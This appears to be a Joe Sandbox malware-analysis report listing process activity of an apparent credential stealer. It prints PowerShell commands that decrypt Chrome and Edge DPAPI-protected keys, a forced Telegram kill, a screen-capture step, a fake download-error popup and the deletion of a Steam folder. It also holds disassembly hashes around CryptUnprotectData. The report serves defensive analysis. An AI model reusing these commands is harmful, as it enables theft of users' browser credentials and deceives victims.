                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:63
                                                                                                                                                                                                                                    Start time:12:23:19
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                    Imagebase:0x7ff7bf340000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:64
                                                                                                                                                                                                                                    Start time:12:23:23
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:65
                                                                                                                                                                                                                                    Start time:12:23:23
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:66
                                                                                                                                                                                                                                    Start time:12:23:41
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                                                    Start time:12:23:41
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:68
                                                                                                                                                                                                                                    Start time:12:23:46
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:69
                                                                                                                                                                                                                                    Start time:12:23:47
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:taskkill /IM Telegram.exe /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6ecac0000
                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:70
                                                                                                                                                                                                                                    Start time:12:23:47
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png" "
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:71
                                                                                                                                                                                                                                    Start time:12:23:47
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7f31f0000
                                                                                                                                                                                                                                    File size:875'008 bytes
                                                                                                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:72
                                                                                                                                                                                                                                    Start time:12:23:47
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png"
                                                                                                                                                                                                                                    Imagebase:0x7a0000
                                                                                                                                                                                                                                    File size:12'800 bytes
                                                                                                                                                                                                                                    MD5 hash:17FE7B96469646C36413F4B80862DE02
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:73
                                                                                                                                                                                                                                    Start time:12:23:47
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:74
                                                                                                                                                                                                                                    Start time:12:23:48
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:75
                                                                                                                                                                                                                                    Start time:12:23:48
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:76
                                                                                                                                                                                                                                    Start time:12:23:48
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
                                                                                                                                                                                                                                    Imagebase:0x7ff7e4150000
                                                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:77
                                                                                                                                                                                                                                    Start time:12:23:48
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:78
                                                                                                                                                                                                                                    Start time:12:23:48
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                    Imagebase:0x7ff7bf340000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Reset < >
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.67587740554.00007FFEC6D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D50000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ffec6d50000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8eb55d78a88a8ca71e2b3d15320d8289259431d51f8103baec7eea66415de382
                                                                                                                                                                                                                                      • Instruction ID: 9d361fb60f458c2ed763ea7527564d7249a9748b50a69fe87d5b6990bdb6b245
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8eb55d78a88a8ca71e2b3d15320d8289259431d51f8103baec7eea66415de382
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD11043051C6488FEB45EF98C8863F87BE0EB59325F0040BAE04DC7562C664A456CB51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.67587740554.00007FFEC6D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D50000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ffec6d50000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 23c00305e37f428da977c858bcff4e389c6b4b76aae6066a31696819fc5888d9
                                                                                                                                                                                                                                      • Instruction ID: 4196e91de45d84d759df2809adbe6623afed9ebad12b03f62887f9e7117d6cba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23c00305e37f428da977c858bcff4e389c6b4b76aae6066a31696819fc5888d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A021D33190CA0C8FDB58EF98C8867F97BE0EB69321F10416ED04ED3252DA74A856CB51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.67587740554.00007FFEC6D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D50000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ffec6d50000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a9dbe749339862693ac790797692bc1b559f691723ec2608aa408ea5593580c5
                                                                                                                                                                                                                                      • Instruction ID: 919ea8f5d2b64e882ac85e7b5b6adebda78fd3ba1a7bd1e353dae690be50bd2c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9dbe749339862693ac790797692bc1b559f691723ec2608aa408ea5593580c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23219030A0CA0C8FDB58EF98D8867F97BE0EBA9321F00416ED049D3252DA71A955CB51
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.67587740554.00007FFEC6D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D50000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ffec6d50000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                                                                                                                                                                                                                      • Instruction ID: ca07ed79b50c1b38c0a8a19beeb74a2dfe86c5af5b4dfffb77b63e4c807978e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6401677111CB0C4FDB48EF0CE451AA6B7E0FB95324F50056DE58AC3661D636E892CB46
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.67588180111.00007FFEC6E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6E20000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ffec6e20000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b8d53368db69ecdd56477f14f6b242de78a45d146e5cce02a686a0168742ed8d
                                                                                                                                                                                                                                      • Instruction ID: f63853561edec376982ba81e9b9f545314e15d6e3e3629ac54f5484237af8a31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8d53368db69ecdd56477f14f6b242de78a45d146e5cce02a686a0168742ed8d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D0A773D085164F9B10A6F8B80A0D5B3D0EA042797040277D10DD3511E91C546187C0

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:6.1%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:100%
                                                                                                                                                                                                                                      Total number of Nodes:3
                                                                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                                                                      execution_graph 692 7ffec6d54aea 693 7ffec6d550d0 CryptUnprotectData 692->693 695 7ffec6d55183 693->695

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000019.00000002.67750420407.00007FFEC6D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D50000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ffec6d50000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 834300711-0
                                                                                                                                                                                                                                      • Opcode ID: 02fabe4b9747e680b644c87301aed9607a1a1d16dfd480e0221998ba03a08238
                                                                                                                                                                                                                                      • Instruction ID: 2aebb7961174a6560bf8d53b79e08059bcddbbeb6ce9e102d9477bbd410011a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02fabe4b9747e680b644c87301aed9607a1a1d16dfd480e0221998ba03a08238
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB412B7091CB889FDB19AF6C9C056B97BE0EF56325F0442BFE449C3293CA646856C7C2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 14 7ffec6d54aea-7ffec6d55100 16 7ffec6d55107-7ffec6d55181 CryptUnprotectData 14->16 17 7ffec6d55183 16->17 18 7ffec6d55189-7ffec6d551b8 16->18 17->18
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000019.00000002.67750420407.00007FFEC6D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D50000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ffec6d50000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 834300711-0
                                                                                                                                                                                                                                      • Opcode ID: 9c0bf283755ee72a4df57ba072aa2ee31c956d564605059b5bc5504bac137421
                                                                                                                                                                                                                                      • Instruction ID: 69fa6b0ca0a5c88dbda67baf9a2cc31727518a9a950e1bebe3da5e708a2a1902
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c0bf283755ee72a4df57ba072aa2ee31c956d564605059b5bc5504bac137421
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD31947191CA089FDB18EF5CD806AB9BBE0FB99311F10422FE449D3651DB74B8558BC2

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:6.4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:3
                                                                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                                                                      execution_graph 671 7ffec6d64ada 672 7ffec6d650d0 CryptUnprotectData 671->672 674 7ffec6d65183 672->674

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.67840607362.00007FFEC6D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D60000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_7ffec6d60000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 834300711-0
                                                                                                                                                                                                                                      • Opcode ID: 027c66578dfbc9ecfc984f7f7df78420fa631c03513fb1eeb081003dc8869eab
                                                                                                                                                                                                                                      • Instruction ID: 275bb7aff63b6c79a53ebb952bad5a88669d7dd4da4bf5693bd182cc90a0ad9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 027c66578dfbc9ecfc984f7f7df78420fa631c03513fb1eeb081003dc8869eab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D412F7091CB888FDB19AF2C9C055B97BE0EF56321F0442BFE449C3293CA64A856C7C2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 14 7ffec6d64ada-7ffec6d65100 16 7ffec6d65107-7ffec6d65181 CryptUnprotectData 14->16 17 7ffec6d65183 16->17 18 7ffec6d65189-7ffec6d651b8 16->18 17->18
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.67840607362.00007FFEC6D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC6D60000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_7ffec6d60000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                      • String ID:
